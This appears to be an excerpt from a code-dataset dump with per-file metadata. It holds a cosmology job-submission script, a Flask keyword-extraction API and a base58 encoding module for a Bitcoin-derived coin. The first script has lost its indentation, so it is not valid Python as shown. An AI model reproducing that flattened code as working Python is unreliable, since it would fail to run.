# b1_fid_dict.update({"zbin2_Mmin12.5_Mmax13.0": })
# b1_fid_dict.update({"zbin2_Mmin13.0_Mmax13.5": })
# b1_fid_dict.update({"zbin2_Mmin13.5_Mmax14.0": })
# b1_fid_dict.update({"zbin3_Mmin12.5_Mmax13.0": })
# b1_fid_dict.update({"zbin3_Mmin13.0_Mmax13.5": })
# b1_fid_dict.update({"zbin3_Mmin13.5_Mmax14.0": })
# b1_fid_dict.update({"zbin4_Mmin12.5_Mmax13.0": })
# b1_fid_dict.update({"zbin4_Mmin13.0_Mmax13.5": })
# b1_fid_dict.update({"zbin4_Mmin13.5_Mmax14.0": })
for zbin in [0, 1, 2, 3, 4]:
for flag_RSD in ["False", "True"]:
if flag_RSD == "False":
MULTIPOLE = [(0,0,0)]
else:
MULTIPOLE = [(0,0,0), (2,0,2),(4,0,4)]
for (ell1, ell2, ELL) in MULTIPOLE:
for sim_data in ["Gadget", "Rockstar"]:
if sim_data == "Gadget":
Mmin_Mmax = [(12.9, 13.1)]
else:
Mmin_Mmax = [(12.5, 13.0), (13.0, 13.5), (13.5, 14.0)]
for (log10_Mmin, log10_Mmax) in Mmin_Mmax:
if flag_recon == "True":
b1_fid = b1_fid_dict["zbin%d_Mmin%2.1f_Mmax%2.1f" % (zbin, log10_Mmin, log10_Mmax)]
data_dir = "/mwork0/sugiymnn/WORK/data/nbody/%04d" % realization
if sim_data == "Gadget":
data_file = "snapdir_%03d/snapshot_%03d" % (zbin, zbin)
random_file = "AAA"
elif sim_data == "Rockstar":
data_file = "rockstar/out_%d.list" % (zbin)
if flag_recon == "False":
random_file = "AAA"
elif flag_recon == "True":
random_file = "rockstar/random/random_Mmin%s_Mmax%s_zbin%d.dat" % (log10_Mmin, log10_Mmax, zbin)
else:
print("ERROR")
exit()
if sim_data == "Gadget":
if flag_recon == "False":
output_dir = "results_test_%s_zbin%d_RSD%s" % (sim_data, zbin, flag_RSD)
elif flag_recon == "True":
output_dir = "results_test_%s_zbin%d_RSD%s_recon_R%02d" % (sim_data, zbin, flag_RSD, RG)
else:
print("ERROR")
exit()
elif sim_data == "Rockstar":
if flag_recon == "False":
output_dir = "results_test_%s_Mmin%2.1f_Mmax%2.1f_zbin%d_RSD%s" % (sim_data, log10_Mmin, log10_Mmax, zbin, flag_RSD)
elif flag_recon == "True":
output_dir = "results_test_%s_Mmin%2.1f_Mmax%2.1f_zbin%d_RSD%s_recon_R%02d" % (sim_data, log10_Mmin, log10_Mmax, zbin, flag_RSD, RG)
else:
print("ERROR")
exit()
else:
print("ERROR")
exit()
fr = open("default_param.ini", "r")
AA = fr.readlines()
fr.close()
AA = [AA[i].replace("data_dir = /mwork0/sugiymnn/WORK/data/boss/galaxy_DR12v5_CMASSLOWZTOT",\
"data_dir = %s" % data_dir) for i in range(len(AA))]
AA = [AA[i].replace("data_file = galaxy_DR12v5_CMASSLOWZTOT_North_ZBIN1.dat",\
"data_file = %s" % data_file) for i in range(len(AA))]
AA = [AA[i].replace("random_file = random_DR12v5_CMASSLOWZTOT_North_ZBIN1.dat",\
"random_file = %s" % random_file) for i in range(len(AA))]
AA = [AA[i].replace("output_dir = results",\
"output_dir = %s" % output_dir) for i in range(len(AA))]
AA = [AA[i].replace("measure = pk", "measure = %s" % measure) for i in range(len(AA))]
AA = [AA[i].replace("realization = 0", "realization = %d" % realization) for i in range(len(AA))]
AA = [AA[i].replace("ell1 = 0", "ell1 = %d" % ell1) for i in range(len(AA))]
AA = [AA[i].replace("ell2 = 0", "ell2 = %d" % ell2) for i in range(len(AA))]
AA = [AA[i].replace("ELL = 0", "ELL = %d" % ELL) for i in range(len(AA))]
AA = [AA[i].replace("boxsize_x = 1000.0", "boxsize_x = %3.1f" % boxsize_x) for i in range(len(AA))]
AA = [AA[i].replace("boxsize_y = 1000.0", "boxsize_y = %3.1f" % boxsize_y) for i in range(len(AA))]
AA = [AA[i].replace("boxsize_z = 1000.0", "boxsize_z = %3.1f" % boxsize_z) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_x = 512", "n_mesh_x = %3.0d" % n_mesh_x) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_y = 512", "n_mesh_y = %3.0d" % n_mesh_y) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_z = 512", "n_mesh_z = %3.0d" % n_mesh_z) for i in range(len(AA))]
AA = [AA[i].replace("kmin = 0.01", "kmin = %1.3f" % kmin) for i in range(len(AA))]
AA = [AA[i].replace("kmax = 0.2", "kmax = %1.3f" % kmax) for i in range(len(AA))]
AA = [AA[i].replace("n_kbin = 20", "n_kbin = %02d" % n_kbin) for i in range(len(AA))]
AA = [AA[i].replace("rmin = 30", "rmin = %2.1f" % rmin) for i in range(len(AA))]
AA = [AA[i].replace("rmax = 150.0", "rmax = %3.1f" % rmax) for i in range(len(AA))]
AA = [AA[i].replace("n_rbin = 25", "n_rbin = %02d" % n_rbin) for i in range(len(AA))]
AA = [AA[i].replace("flag_recon = False", "flag_recon = %s" % flag_recon) for i in range(len(AA))]
AA = [AA[i].replace("b1_fid = 1.0", "b1_fid = %1.3f" % b1_fid) for i in range(len(AA))]
AA = [AA[i].replace("RG = 15.0", "RG = %2.1f" % RG) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_recon_x = 512", "n_mesh_recon_x = %3.0d" % n_mesh_x) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_recon_y = 512", "n_mesh_recon_y = %3.0d" % n_mesh_y) for i in range(len(AA))]
AA = [AA[i].replace("n_mesh_recon_z = 512", "n_mesh_recon_z = %3.0d" % n_mesh_z) for i in range(len(AA))]
AA = [AA[i].replace("ith_kbin = 0", "ith_kbin = %d" % ith_kbin) for i in range(len(AA))]
AA = [AA[i].replace("ith_rbin = 0", "ith_rbin = %d" % ith_rbin) for i in range(len(AA))]
AA = [AA[i].replace("sim_data = Gadget", "sim_data = %s" % sim_data) for i in range(len(AA))]
AA = [AA[i].replace("flag_RSD = True", "flag_RSD = %s" % flag_RSD) for i in range(len(AA))]
AA = [AA[i].replace("log10_Mmin = 12.9", "log10_Mmin = %2.1f" % log10_Mmin) for i in range(len(AA))]
AA = [AA[i].replace("log10_Mmax = 13.5", "log10_Mmax = %2.1f" % log10_Mmax) for i in range(len(AA))]
if sim_data == "Gadget":
if flag_recon == "False":
fname = "%s%d%d%d_%s_zbin%d_RSD%s" % (measure, ell1, ell2, ELL, sim_data, zbin, flag_RSD)
elif flag_recon == "True":
fname = "%s%d%d%d_%s_zbin%d_RSD%s_recon_R%02d" % (measure, ell1, ell2, ELL, sim_data, zbin, flag_RSD, RG)
elif sim_data == "Rockstar":
if flag_recon == "False":
fname = "%s%d%d%d_%s_Mmin%2.1f_Mmax%2.1f_zbin%d_RSD%s" % (measure, ell1, ell2, ELL, sim_data, log10_Mmin, log10_Mmax, zbin, flag_RSD)
elif flag_recon == "True":
fname = "%s%d%d%d_%s_Mmin%2.1f_Mmax%2.1f_zbin%d_RSD%s_recon_R%02d" % (measure, ell1, ell2, ELL, sim_data, log10_Mmin, log10_Mmax, zbin, flag_RSD, RG)
else:
print("ERROR")
exit()
param_file = "PARAMS/param_%s.ini" % (fname)
fw = open(param_file, "w")
fw.writelines(AA)
fw.close()
fr = open("run_base.sh", "r")
AA = fr.readlines()
fr.close()
log_file = "LOG/%s.log" % (fname)
AA = [AA[i].replace("./a.out default_param.ini > log", "./a.out %s > %s" % (param_file, log_file)) for i in range(len(AA))]
fw = open("run_new.sh", "w")
fw.writelines(AA)
fw.close()
subprocess.call(["chmod", "u+x", "run_new.sh"])
subprocess.call(["qsub", "run_new.sh"])
| 48.957547 | 177 | 0.458233 |
e892c7a05a248319723c89a515ffff77ae1d506b | 3,134 | py | Python | services/web/project/__init__.py | bkolosk1/bert-multilingual-kws-docker | cfdaf03b8a980632342cb79c190d2c98bee9bccd | [
"MIT"
] | null | null | null | services/web/project/__init__.py | bkolosk1/bert-multilingual-kws-docker | cfdaf03b8a980632342cb79c190d2c98bee9bccd | [
"MIT"
] | null | null | null | services/web/project/__init__.py | bkolosk1/bert-multilingual-kws-docker | cfdaf03b8a980632342cb79c190d2c98bee9bccd | [
"MIT"
] | 1 | 2022-03-23T15:36:51.000Z | 2022-03-23T15:36:51.000Z | import os
import json
from flask import (
Flask,
jsonify,
send_from_directory,
request,
redirect,
url_for
)
from flask_restx import Api, Resource, fields, abort, reqparse
import werkzeug
werkzeug.cached_property = werkzeug.utils.cached_property
from werkzeug.utils import secure_filename
from werkzeug.middleware.proxy_fix import ProxyFix
from . import api_functions
from . import keyword_extraction_main as kw
#from .bert_crossling_prep import get_batch, Corpus, batchify, batchify_docs, get_batch_docs, file_to_df
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
from transformers import BertTokenizer
from lemmagen3 import Lemmatizer
lemmatizer = Lemmatizer('sl').lemmatize
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
api = Api(app, version='1.0',
title='API services',
description='Multilingual keyword extraction REST API')
ns = api.namespace('rest_api', description='REST services API')
args = {
'max_length': 256,
'cuda': False,
'kw_cut': 10,
'stemmer': lemmatizer,
'split_docs': True,
'bpe': True,
'max_vocab_size' : 0,
'classification': True,
'adaptive': False,
'transfer_learning': True,
'POS_tags': False,
'bpe': True,
'masked_lm': False,
'rnn': False,
'crf': False,
'dev_id' : 0,
'n_ctx' : 256,
'lang' : 'en',
'dict_path' : "dict_russian_latvian_estonian_slovenian_croatian_english_bpe_nopos_nornn_nocrf.ptb",
}
kw_model_path = "model_russian_latvian_estonian_slovenian_croatian_english_folder_russian_latvian_estonian_slovenian_croatian_english_loss_0.06955235407170482_epoch_9.pt"
kw_dictionary_path = "dict_russian_latvian_estonian_slovenian_croatian_english_bpe_nopos_nornn_nocrf.ptb"
kw_sp = BertTokenizer.from_pretrained('bert-base-multilingual-uncased',return_dict=False)
kw_model = kw.loadModel(os.path.join("project", "trained_classification_models", kw_model_path), args['cuda'])
kw_dictionary = kw.loadDict(os.path.join("project", "dictionaries", kw_dictionary_path))
#kw_sp = BertTokenizer.from_pretrained('bert-base-multilingual-uncased')
#kw_sp.Load(os.path.join("project","bpe", "SloBPE.model"))
# input and output definitions
kw_extractor_input = api.model('KeywordExtractorInput', {
'text': fields.String(required=True, description='Title + lead + body of the article'),
})
kw_extractor_output = api.model('KeywordExtractorOutput', {
'keywords': fields.List(fields.String, description='Extracted keywords'),
})
@ns.route('/extract_keywords/')
class KeywordExtractor(Resource):
@ns.doc('Extracts keywords from news article')
@ns.expect(kw_extractor_input, validate=True)
@ns.marshal_with(kw_extractor_output)
def post(self):
kw_lem = api_functions.extract_keywords(api.payload['text'], kw_model, kw_dictionary, kw_sp, lemmatizer, args)
return {"keywords": kw_lem}
@ns.route('/health/')
class Health(Resource):
@ns.response(200, "successfully fetched health details")
def get(self):
return {"status": "running", "message": "Health check successful"}, 200, {}
| 31.979592 | 170 | 0.741863 |
5638db1cae5467e823fde3b9dda104a5986f6cf0 | 2,993 | py | Python | contrib/testgen/base58.py | helveticum/helveticum | 0781224d86d542281b1f2f98ae533d1252e1e71b | [
"MIT"
] | 1 | 2017-07-06T06:04:15.000Z | 2017-07-06T06:04:15.000Z | contrib/testgen/base58.py | helveticum/helveticum | 0781224d86d542281b1f2f98ae533d1252e1e71b | [
"MIT"
] | null | null | null | contrib/testgen/base58.py | helveticum/helveticum | 0781224d86d542281b1f2f98ae533d1252e1e71b | [
"MIT"
] | null | null | null | # Copyright (c) 2012-2016 The Helveticum Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Helveticum base58 encoding and decoding.
Based on https://helveticumtalk.org/index.php?topic=1026.0 (public domain)
'''
import hashlib
# for compatibility with following code...
class SHA256:
new = hashlib.sha256
if str != bytes:
# Python 3.x
def ord(c):
return c
def chr(n):
return bytes( (n,) )
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
b58chars = __b58chars
def b58encode(v):
""" encode v, which is a string of bytes, to base58.
"""
long_value = 0
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Helveticum does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0': nPad += 1
else: break
return (__b58chars[0]*nPad) + result
def b58decode(v, length = None):
""" decode v into a string of len bytes
"""
long_value = 0
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = bytes()
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]: nPad += 1
else: break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
def checksum(v):
"""Return 32-bit checksum based on SHA256"""
return SHA256.new(SHA256.new(v).digest()).digest()[0:4]
def b58encode_chk(v):
"""b58encode a string, with 32-bit checksum"""
return b58encode(v + checksum(v))
def b58decode_chk(v):
"""decode a base58 string, check and remove checksum"""
result = b58decode(v)
if result is None:
return None
if result[-4:] == checksum(result[:-4]):
return result[:-4]
else:
return None
def get_bcaddress_version(strAddress):
""" Returns None if strAddress is invalid. Otherwise returns integer version of address. """
addr = b58decode_chk(strAddress)
if addr is None or len(addr)!=21: return None
version = addr[0]
return ord(version)
if __name__ == '__main__':
# Test case (from http://gitorious.org/helveticum/python-base58.git)
assert get_bcaddress_version('15VjRaDX9zpbA8LVnbrCAFzrVzN7ixHNsC') is 0
_ohai = 'o hai'.encode('ascii')
_tmp = b58encode(_ohai)
assert _tmp == 'DYB3oMS'
assert b58decode(_tmp, 5) == _ohai
print("Tests passed")
| 27.971963 | 97 | 0.640829 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.